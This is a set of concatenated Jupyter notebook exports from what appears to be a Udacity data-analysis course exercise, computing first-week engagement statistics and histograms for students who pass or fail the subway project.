def get_totals_by_acct_for_key(inDict, inKey):
total_by_account = {}
for key, rec in inDict.items():
total = 0
for subRec in rec:
total += subRec[inKey]
total_by_account[key] = total
return total_by_account
total_minutes_by_account = get_totals_by_acct_for_key(engagement_by_account, 'total_minutes_visited')
import numpy as np
def get_statistics(inDict):
total = list(inDict.values())
print('Mean:', np.mean(total))
print('Standard deviation:', np.std(total))
print('Minimum:', np.min(total))
print('Maximum:', np.max(total))
# Summarize the data about minutes spent in the classroom
get_statistics(total_minutes_by_account)
###Output
Mean: 306.708326753
Standard deviation: 412.996933409
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
for key, val in total_minutes_by_account.items():
if val > 3500:
print(engagement_by_account[key])
###Output
[{'lessons_completed': 4, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 9, 0, 0), 'has_visited': 1, 'num_courses_visited': 4, 'has_visisted': 1, 'total_minutes_visited': 850.519339666}, {'lessons_completed': 6, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 10, 0, 0), 'has_visited': 1, 'num_courses_visited': 6, 'has_visisted': 1, 'total_minutes_visited': 872.633923334}, {'lessons_completed': 6, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 11, 0, 0), 'has_visited': 1, 'num_courses_visited': 2, 'has_visisted': 1, 'total_minutes_visited': 777.018903666}, {'lessons_completed': 2, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 12, 0, 0), 'has_visited': 1, 'num_courses_visited': 1, 'has_visisted': 0, 'total_minutes_visited': 294.568774}, {'lessons_completed': 1, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 13, 0, 0), 'has_visited': 1, 'num_courses_visited': 3, 'has_visisted': 1, 'total_minutes_visited': 471.2139785}, {'lessons_completed': 1, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 14, 0, 0), 'has_visited': 1, 'num_courses_visited': 2, 'has_visisted': 1, 'total_minutes_visited': 298.778345333}, {'lessons_completed': 0, 'account_key': '163', 'projects_completed': 0, 'utc_date': datetime.datetime(2015, 7, 15, 0, 0), 'has_visited': 0, 'num_courses_visited': 0, 'has_visisted': 0, 'total_minutes_visited': 0.0}]
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
total_lessons_by_account = get_totals_by_acct_for_key(engagement_by_account, 'lessons_completed')
get_statistics(total_lessons_by_account)
###Output
Mean: 1.63618090452
Standard deviation: 3.00256129983
Minimum: 0
Maximum: 36
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
num_times_visited_by_acct = get_totals_by_acct_for_key(engagement_by_account, 'has_visited')
get_statistics(num_times_visited_by_acct)
###Output
Mean: 2.86733668342
Standard deviation: 2.25519800292
Minimum: 0
Maximum: 7
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
passing_keys = ['PASSED', 'DISTINCTION']
passed_subway_project = set(a['account_key'] for a in paid_submissions if a['lesson_key'] in subway_project_lesson_keys and a['assigned_rating'] in passing_keys)
passing_engagement = [a for a in paid_engagement_in_first_week if a['account_key'] in passed_subway_project]
non_passing_engagement =[a for a in paid_engagement_in_first_week if a['account_key'] not in passed_subway_project]
print(len(passing_engagement))
print(len(non_passing_engagement))
###Output
4527
2392
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
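# One possible sketch (illustrative): reuse group_by_key,
# get_totals_by_acct_for_key and get_statistics from the cells above.
for metric in ['total_minutes_visited', 'lessons_completed', 'has_visited']:
    for label, group in [('Passing', passing_engagement),
                         ('Non-passing', non_passing_engagement)]:
        print(label, 'students -', metric)
        get_statistics(get_totals_by_acct_for_key(group_by_key(group, 'account_key'), metric))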
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
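# A possible sketch (illustrative): one histogram per metric and per group,
# using the same helpers as the summary statistics above.
%matplotlib inline
import matplotlib.pyplot as plt

for metric in ['total_minutes_visited', 'lessons_completed', 'has_visited']:
    for label, group in [('Passing', passing_engagement),
                         ('Non-passing', non_passing_engagement)]:
        totals = get_totals_by_acct_for_key(group_by_key(group, 'account_key'), metric)
        plt.hist(list(totals.values()), bins=8)
        plt.title('{} students: {}'.format(label, metric))
        plt.show()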
###Output
_____no_output_____
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
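# A possible polished plot (illustrative): seaborn styling, axis labels,
# a title and an explicit bins argument for hist().
import matplotlib.pyplot as plt
import seaborn as sns
sns.set()

visits_passing = get_totals_by_acct_for_key(
    group_by_key(passing_engagement, 'account_key'), 'has_visited')
plt.hist(list(visits_passing.values()), bins=8)
plt.xlabel('Days visited in the first week')
plt.ylabel('Number of students')
plt.title('First-week classroom visits (students who passed the subway project)')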
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
## Longer version of code (replaced with shorter, equivalent version below)
# enrollments = []
# f = open('enrollments.csv', 'rb')
# reader = unicodecsv.DictReader(f)
# for row in reader:
# enrollments.append(row)
# f.close()
def open_csv(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
#####################################
# 1 #
#####################################
## Read in the data from daily_engagement.csv and project_submissions.csv
## and store the results in the below variables.
## Then look at the first row of each table.
enrollments = open_csv('enrollments.csv')
daily_engagement = open_csv('daily_engagement.csv')
project_submissions = open_csv('project_submissions.csv')
print enrollments[0]
print daily_engagement[0]
print project_submissions[0]
###Output
{u'status': u'canceled', u'is_udacity': u'True', u'is_canceled': u'True', u'join_date': u'2014-11-10', u'account_key': u'448', u'cancel_date': u'2015-01-14', u'days_to_cancel': u'65'}
{u'lessons_completed': u'0.0', u'num_courses_visited': u'1.0', u'total_minutes_visited': u'11.6793745', u'projects_completed': u'0.0', u'acct': u'0', u'utc_date': u'2015-01-09'}
{u'lesson_key': u'3176718735', u'processing_state': u'EVALUATED', u'account_key': u'256', u'assigned_rating': u'UNGRADED', u'completion_date': u'2015-01-16', u'creation_date': u'2015-01-14'}
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
## Rename the "acct" column in the daily_engagement table to "account_key".
for engagement_record in daily_engagement:
engagement_record['account_key'] = engagement_record['acct']
del engagement_record['acct']
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
def get_num_unique_students(data):
return set(map(lambda x: x['account_key'], data))
enrollment_unique_students = get_num_unique_students(enrollments)
engagement_unique_students = get_num_unique_students(daily_engagement)
submission_unique_students = get_num_unique_students(project_submissions)
print 'Enrollment Rows:', len(enrollments)
print 'Enrollment Students:', len(enrollment_unique_students)
print 'Engagement Rows:', len(daily_engagement)
print 'Engagement Students:', len(engagement_unique_students)
print 'Submission Rows:', len(project_submissions)
print 'Submission Students:', len(submission_unique_students)
###Output
Enrollment Rows: 1640
Enrollment Students: 1302
Engagement Rows: 136240
Engagement Students: 1237
Submission Rows: 3642
Submission Students: 743
###Markdown
Problems in the Data
###Code
daily_engagement[0]['account_key']
###Output
_____no_output_____
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
for enrollment_record in enrollments:
if enrollment_record['account_key'] not in engagement_unique_students and not enrollment_record['cancel_date']:
print enrollment_record
break
###Output
{u'status': u'current', u'is_udacity': True, u'is_canceled': False, u'join_date': datetime.datetime(2015, 2, 25, 0, 0), u'account_key': u'1101', u'cancel_date': None, u'days_to_cancel': None}
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
for enrollment_record in enrollments:
student = enrollment_record['account_key']
days_to_cancel = enrollment_record['days_to_cancel']
if student not in engagement_unique_students \
and days_to_cancel != 0:
print enrollment_record
a = set()
a.add(12)
a
###Output
_____no_output_____
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print len(non_udacity_enrollments)
print len(non_udacity_engagement)
print len(non_udacity_submissions)
###Output
1622
135656
3634
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students = {}
for enrollment_record in non_udacity_enrollments:
days_to_cancel = enrollment_record['days_to_cancel']
if days_to_cancel == None or days_to_cancel > 7:
account_key = enrollment_record['account_key']
enrollment_date = enrollment_record['join_date']
if account_key not in paid_students \
or enrollment_date > paid_students[account_key]:
paid_students[account_key] = enrollment_date
len(paid_students)
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days < 7 and time_delta.days >= 0
def remove_free_trial_cancels(data):
new_data = []
for data_point in data:
if data_point['account_key'] in paid_students:
new_data.append(data_point)
return new_data
# Remove free trial
paid_enrollments = remove_free_trial_cancels(non_udacity_enrollments)
paid_engagement = remove_free_trial_cancels(non_udacity_engagement)
paid_submissions = remove_free_trial_cancels(non_udacity_submissions)
print len(paid_enrollments)
print len(paid_engagement)
print len(paid_submissions)
for data_point in paid_engagement:
data_point['has_visited'] = 1 if data_point['num_courses_visited'] > 0 else 0
paid_engagement[0]
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
paid_engagement_in_first_week = []
for engagement in paid_engagement:
account_key = engagement['account_key']
if within_one_week(paid_students[account_key],
engagement['utc_date']):
paid_engagement_in_first_week.append(engagement)
len(paid_engagement_in_first_week)
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
def group_data(data, key_name):
grouped_data = defaultdict(list)
for data_point in data:
key = data_point[key_name]
grouped_data[key].append(data_point)
return grouped_data
engagement_by_account = group_data(paid_engagement_in_first_week,
'account_key')
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
total += data_point[field_name]
summed_data[key] = total
return summed_data
total_minutes_by_account = sum_grouped_items(engagement_by_account,
'total_minutes_visited')
import numpy as np
def dscript_data(data):
print 'Mean:', np.mean(data)
print 'Standard deviation:', np.std(data)
print 'Minimum:', np.min(data)
print 'Maximum:', np.max(data)
dscript_data(total_minutes_by_account.values())
###Output
Mean: 306.708326753
Standard deviation: 412.996933409
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
student_with_max_minutes = None
max_minutes = 0
for student, total_minutes in total_minutes_by_account.items():
if total_minutes > max_minutes:
max_minutes = total_minutes
student_with_max_minutes = student
max_minutes
engagement_by_account[student_with_max_minutes]
###Output
_____no_output_____
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
total_lessons_completed_by_account = sum_grouped_items(engagement_by_account,
'lessons_completed')
len(total_lessons_completed_by_account)
dscript_data(total_lessons_completed_by_account.values())
###Output
Mean: 1.63618090452
Standard deviation: 3.00256129983
Minimum: 0
Maximum: 36
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
## days each student visits the classroom during the first week.
num_visits_by_account = sum_grouped_items(engagement_by_account, 'has_visited')
dscript_data(num_visits_by_account.values())
assigned_rating = set()
for data_point in paid_submissions:
assigned_rating.add(data_point['assigned_rating'])
assigned_rating
###Output
_____no_output_____
###Markdown
Splitting out Passing Students
###Code
######################################
# 11 #
######################################
## Create two lists of engagement data for paid students in the first week.
## The first list should contain data for students who eventually pass the
## subway project, and the second list should contain data for students
## who do not.
subway_project_lesson_keys = ['746169184', '3176718735']
passing_engagement = []
non_passing_engagement = []
passed_account_id = set()
for submission_record in paid_submissions:
if submission_record['lesson_key'] in subway_project_lesson_keys \
and submission_record['assigned_rating'] in ['PASSED', 'DISTINCTION']:
passed_account_id.add(submission_record['account_key'])
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] in passed_account_id:
passing_engagement.append(engagement_record)
else:
non_passing_engagement.append(engagement_record)
print 'passing_engagement:', len(passing_engagement)
print 'non_passing_engagement:', len(non_passing_engagement)
###Output
passing_engagement: 4527
non_passing_engagement: 2392
###Markdown
Comparing the Two Student Groups
###Code
######################################
# 12 #
######################################
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
def descript_metrics(data, keys):
grouped_data = group_data(data, 'account_key')
for key in keys:
print key
total_by_key = sum_grouped_items(grouped_data, key)
dscript_data(total_by_key.values())
keys = ['total_minutes_visited', 'lessons_completed', 'has_visited']
descript_metrics(passing_engagement, keys)
descript_metrics(non_passing_engagement, keys)
data = [1, 2, 1, 3, 3, 1, 4, 2]
%matplotlib inline
%config InlineBackend.figure_format = 'retina'
import matplotlib.pyplot as plt
import seaborn as sns
plt.hist(data)
###Output
_____no_output_____
###Markdown
Making Histograms
###Code
######################################
# 13 #
######################################
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
def histongrams_metrics(key):
for data in [passing_engagement, non_passing_engagement]:
grouped_data = group_data(data, 'account_key')
print key
total_by_key = sum_grouped_items(grouped_data, key)
plt.hist(total_by_key.values(), bins=8)
histongrams_metrics('total_minutes_visited')
histongrams_metrics('lessons_completed')
histongrams_metrics('has_visited')
###Output
has_visited
has_visited
###Markdown
Improving Plots and Sharing Findings
###Code
######################################
# 14 #
######################################
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
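# A possible polished version (illustrative): matplotlib and seaborn are already
# imported above, so just add labels, a title and an explicit bins value.
passing_visits = sum_grouped_items(group_data(passing_engagement, 'account_key'),
                                   'has_visited')
plt.hist(list(passing_visits.values()), bins=8)
plt.xlabel('Days visited in the first week')
plt.ylabel('Number of students')
plt.title('First-week classroom visits (students who passed the subway project)')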
###Output
_____no_output_____
###Markdown
Before we get started, a couple of reminders to keep in mind when using iPython notebooks:- Remember that you can see from the left side of a code cell when it was last run if there is a number within the brackets.- When you start a new notebook session, make sure you run all of the cells up to the point where you last left off. Even if the output is still visible from when you ran the cells in your previous session, the kernel starts in a fresh state so you'll need to reload the data, etc. on a new session.- The previous point is useful to keep in mind if your answers do not match what is expected in the lesson's quizzes. Try reloading the data and run all of the processing steps one by one in order to make sure that you are working with the same variables and data that are at each quiz stage. Load Data from CSVs
###Code
import unicodecsv
def read_csv(filename):
with open(filename, 'rb') as f:
reader = unicodecsv.DictReader(f)
return list(reader)
enrollments = read_csv('enrollments.csv')
daily_engagement = read_csv('daily_engagement.csv')
project_submissions = read_csv('project_submissions.csv')
enrollments[0]
daily_engagement[0]
project_submissions[0]
###Output
_____no_output_____
###Markdown
Fixing Data Types
###Code
from datetime import datetime as dt
# Takes a date as a string, and returns a Python datetime object.
# If there is no date given, returns None
def parse_date(date):
if date == '':
return None
else:
return dt.strptime(date, '%Y-%m-%d')
# Takes a string which is either an empty string or represents an integer,
# and returns an int or None.
def parse_maybe_int(i):
if i == '':
return None
else:
return int(i)
# Clean up the data types in the enrollments table
for enrollment in enrollments:
enrollment['cancel_date'] = parse_date(enrollment['cancel_date'])
enrollment['days_to_cancel'] = parse_maybe_int(enrollment['days_to_cancel'])
enrollment['is_canceled'] = enrollment['is_canceled'] == 'True'
enrollment['is_udacity'] = enrollment['is_udacity'] == 'True'
enrollment['join_date'] = parse_date(enrollment['join_date'])
enrollments[0]
# Clean up the data types in the engagement table
for engagement_record in daily_engagement:
engagement_record['lessons_completed'] = int(float(engagement_record['lessons_completed']))
engagement_record['num_courses_visited'] = int(float(engagement_record['num_courses_visited']))
engagement_record['projects_completed'] = int(float(engagement_record['projects_completed']))
engagement_record['total_minutes_visited'] = float(engagement_record['total_minutes_visited'])
engagement_record['utc_date'] = parse_date(engagement_record['utc_date'])
daily_engagement[0]
# Clean up the data types in the submissions table
for submission in project_submissions:
submission['completion_date'] = parse_date(submission['completion_date'])
submission['creation_date'] = parse_date(submission['creation_date'])
project_submissions[0]
###Output
_____no_output_____
###Markdown
Note when running the above cells that we are actively changing the contents of our data variables. If you try to run these cells multiple times in the same session, an error will occur. Investigating the Data
###Code
#####################################
# 2 #
#####################################
## Find the total number of rows and the number of unique students (account keys)
## in each table.
def uniquenum(filename):
s = set()
for row in filename:
s.add(row['account_key'])
return len(s)
def unique_list(filename):
r = set()
for row in filename:
r.add(row['acct'])
return len(r)
enrollment_num_rows = len(enrollments) # Replace this with your code
enrollment_num_unique_students = uniquenum(enrollments) # Replace this with your code
engagement_num_rows = len(daily_engagement) # Replace this with your code
engagement_num_unique_students = unique_list(daily_engagement) # Replace this with your code
submission_num_rows = len(project_submissions) # Replace this with your code
submission_num_unique_students = uniquenum(project_submissions) # Replace this with your code
print('enrollment_num_rows:', enrollment_num_rows)
print('enrollment_num_unique_students:', enrollment_num_unique_students)
print('engagement_num_rows:', engagement_num_rows)
print('engagement_num_unique_students:', engagement_num_unique_students)
print('submission_num_rows:', submission_num_rows)
print('submission_num_unique_students:', submission_num_unique_students)
###Output
('enrollment_num_rows:', 1640)
('enrollment_num_unique_students:', 1302)
('engagement_num_rows:', 136240)
('engagement_num_unique_students:', 1237)
('submission_num_rows:', 3642)
('submission_num_unique_students:', 743)
###Markdown
Problems in the Data
###Code
#####################################
# 3 #
#####################################
## Rename the "acct" column in the daily_engagement table to "account_key".
for engagement_record in daily_engagement:
engagement_record['account_key'] = engagement_record['acct']
del engagement_record['acct']
print(daily_engagement[0]['account_key'])
###Output
0
###Markdown
Missing Engagement Records
###Code
#####################################
# 4 #
#####################################
## Find any one student enrollments where the student is missing from the daily engagement table.
## Output that enrollment.
def unique_students(table):
s = set()
for row in table:
s.add(row['account_key'])
return s
unique_engagement_students = unique_students(daily_engagement)
unique_enrolled_students = unique_students(enrollments)
for enrollment in enrollments:
unique_enrolled_student = enrollment['account_key']
if unique_enrolled_student not in unique_engagement_students:
print enrollment
break
###Output
{u'status': u'canceled', u'is_udacity': False, u'is_canceled': True, u'join_date': datetime.datetime(2014, 11, 12, 0, 0), u'account_key': u'1219', u'cancel_date': datetime.datetime(2014, 11, 12, 0, 0), u'days_to_cancel': 0}
###Markdown
Checking for More Problem Records
###Code
#####################################
# 5 #
#####################################
## Find the number of surprising data points (enrollments missing from
## the engagement table) that remain, if any.
num_problem = 0
for enrollment in enrollments:
unique_enrolled_student = enrollment['account_key']
if unique_enrolled_student not in unique_engagement_students:
if enrollment['join_date'] != enrollment['cancel_date']:
print enrollment
num_problem += 1
print num_problem
###Output
{u'status': u'canceled', u'is_udacity': True, u'is_canceled': True, u'join_date': datetime.datetime(2015, 1, 10, 0, 0), u'account_key': u'1304', u'cancel_date': datetime.datetime(2015, 3, 10, 0, 0), u'days_to_cancel': 59}
{u'status': u'canceled', u'is_udacity': True, u'is_canceled': True, u'join_date': datetime.datetime(2015, 3, 10, 0, 0), u'account_key': u'1304', u'cancel_date': datetime.datetime(2015, 6, 17, 0, 0), u'days_to_cancel': 99}
{u'status': u'current', u'is_udacity': True, u'is_canceled': False, u'join_date': datetime.datetime(2015, 2, 25, 0, 0), u'account_key': u'1101', u'cancel_date': None, u'days_to_cancel': None}
3
###Markdown
Tracking Down the Remaining Problems
###Code
# Create a set of the account keys for all Udacity test accounts
udacity_test_accounts = set()
for enrollment in enrollments:
if enrollment['is_udacity']:
udacity_test_accounts.add(enrollment['account_key'])
len(udacity_test_accounts)
# Given some data with an account_key field, removes any records corresponding to Udacity test accounts
def remove_udacity_accounts(data):
non_udacity_data = []
for data_point in data:
if data_point['account_key'] not in udacity_test_accounts:
non_udacity_data.append(data_point)
return non_udacity_data
# Remove Udacity test accounts from all three tables
non_udacity_enrollments = remove_udacity_accounts(enrollments)
non_udacity_engagement = remove_udacity_accounts(daily_engagement)
non_udacity_submissions = remove_udacity_accounts(project_submissions)
print len(non_udacity_enrollments)
print len(non_udacity_engagement)
print len(non_udacity_submissions)
###Output
1622
135656
3634
###Markdown
Refining the Question
###Code
#####################################
# 6 #
#####################################
## Create a dictionary named paid_students containing all students who either
## haven't canceled yet or who remained enrolled for more than 7 days. The keys
## should be account keys, and the values should be the date the student enrolled.
paid_students = {}
for enrollment in non_udacity_enrollments:
if (not enrollment['is_canceled'] or enrollment['days_to_cancel'] > 7):
account_key = enrollment['account_key']
enrollment_date = enrollment['join_date']
if (account_key not in paid_students or enrollment_date > paid_students[account_key]):
paid_students[account_key] = enrollment_date
len(paid_students)
###Output
_____no_output_____
###Markdown
Getting Data from First Week
###Code
# Takes a student's join date and the date of a specific engagement record,
# and returns True if that engagement record happened within one week
# of the student joining.
def within_one_week(join_date, engagement_date):
time_delta = engagement_date - join_date
return time_delta.days >= 0 and time_delta.days < 7
#####################################
# 7 #
#####################################
## Create a list of rows from the engagement table including only rows where
## the student is one of the paid students you just found, and the date is within
## one week of the student's join date.
def remove_free_trial_cancels(data):
new_data = []
for data_point in data:
if data_point['account_key'] in paid_students:
new_data.append(data_point)
return new_data
paid_enrollment = remove_free_trial_cancels(non_udacity_enrollments)
paid_engagement = remove_free_trial_cancels(non_udacity_engagement)
paid_submission = remove_free_trial_cancels(non_udacity_submissions)
print len(paid_enrollment)
print len(paid_engagement)
print len(paid_submission)
paid_engagement_in_first_week = []
for engagement_record in paid_engagement:
account_key = engagement_record['account_key']
join_date = paid_students[account_key]
engagement_record_date = engagement_record['utc_date']
if within_one_week(join_date, engagement_record_date):
paid_engagement_in_first_week.append(engagement_record)
len(paid_engagement_in_first_week)
###Output
_____no_output_____
###Markdown
Exploring Student Engagement
###Code
from collections import defaultdict
# Create a dictionary of engagement grouped by student.
# The keys are account keys, and the values are lists of engagement records.
engagement_by_account = defaultdict(list)
for engagement_record in paid_engagement_in_first_week:
account_key = engagement_record['account_key']
engagement_by_account[account_key].append(engagement_record)
# Create a dictionary with the total minutes each student spent in the classroom during the first week.
# The keys are account keys, and the values are numbers (total minutes)
total_minutes_by_account = {}
for account_key, engagement_for_student in engagement_by_account.items():
total_minutes = 0
for engagement_record in engagement_for_student:
total_minutes += engagement_record['total_minutes_visited']
total_minutes_by_account[account_key] = total_minutes
import numpy as np
# Summarize the data about minutes spent in the classroom
total_minutes = total_minutes_by_account.values()
print 'Mean:', np.mean(total_minutes)
print 'Standard deviation:', np.std(total_minutes)
print 'Minimum:', np.min(total_minutes)
print 'Maximum:', np.max(total_minutes)
###Output
Mean: 306.708326753
Standard deviation: 412.996933409
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Debugging Data Analysis Code
###Code
#####################################
# 8 #
#####################################
## Go through a similar process as before to see if there is a problem.
## Locate at least one surprising piece of data, output it, and take a look at it.
student_with_max_minutes = None
max_minutes = 0
for student, total_minutes in total_minutes_by_account.items():
if total_minutes > max_minutes:
max_minutes = total_minutes
student_with_max_minutes = student
max_minutes
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] == student_with_max_minutes:
print engagement_record
###Output
{u'lessons_completed': 4, u'num_courses_visited': 4, u'total_minutes_visited': 850.519339666, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 9, 0, 0)}
{u'lessons_completed': 6, u'num_courses_visited': 6, u'total_minutes_visited': 872.633923334, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 10, 0, 0)}
{u'lessons_completed': 6, u'num_courses_visited': 2, u'total_minutes_visited': 777.018903666, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 11, 0, 0)}
{u'lessons_completed': 2, u'num_courses_visited': 1, u'total_minutes_visited': 294.568774, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 12, 0, 0)}
{u'lessons_completed': 1, u'num_courses_visited': 3, u'total_minutes_visited': 471.2139785, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 13, 0, 0)}
{u'lessons_completed': 1, u'num_courses_visited': 2, u'total_minutes_visited': 298.778345333, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 14, 0, 0)}
{u'lessons_completed': 0, u'num_courses_visited': 0, u'total_minutes_visited': 0.0, u'projects_completed': 0, 'account_key': u'163', u'utc_date': datetime.datetime(2015, 7, 15, 0, 0)}
###Markdown
Lessons Completed in First Week
###Code
#####################################
# 9 #
#####################################
## Adapt the code above to find the mean, standard deviation, minimum, and maximum for
## the number of lessons completed by each student during the first week. Try creating
## one or more functions to re-use the code above.
from collections import defaultdict
def group_data(data, key_name):
grouped_data = defaultdict(list)
for data_point in data:
key = data_point[key_name]
grouped_data[key].append(data_point)
return grouped_data
engagement_by_account = group_data(paid_engagement_in_first_week,
'account_key')
def sum_grouped_items(grouped_data, field_name):
summed_data = {}
for key, data_points in grouped_data.items():
total = 0
for data_point in data_points:
total += data_point[field_name]
summed_data[key] = total
return summed_data
total_minutes_by_account = sum_grouped_items(engagement_by_account,
'total_minutes_visited')
import numpy as np
%pylab inline
import matplotlib.pyplot as plt
# Summarize the given data
def describe_data(data):
print 'Mean:', np.mean(data)
print 'Standard deviation:', np.std(data)
print 'Minimum:', np.min(data)
print 'Maximum:', np.max(data)
lessons_completed_by_account = sum_grouped_items(engagement_by_account,
'lessons_completed')
describe_data(lessons_completed_by_account.values())
###Output
Populating the interactive namespace from numpy and matplotlib
Mean: 1.63618090452
Standard deviation: 3.00256129983
Minimum: 0
Maximum: 36
###Markdown
Number of Visits in First Week
###Code
######################################
# 10 #
######################################
## Find the mean, standard deviation, minimum, and maximum for the number of
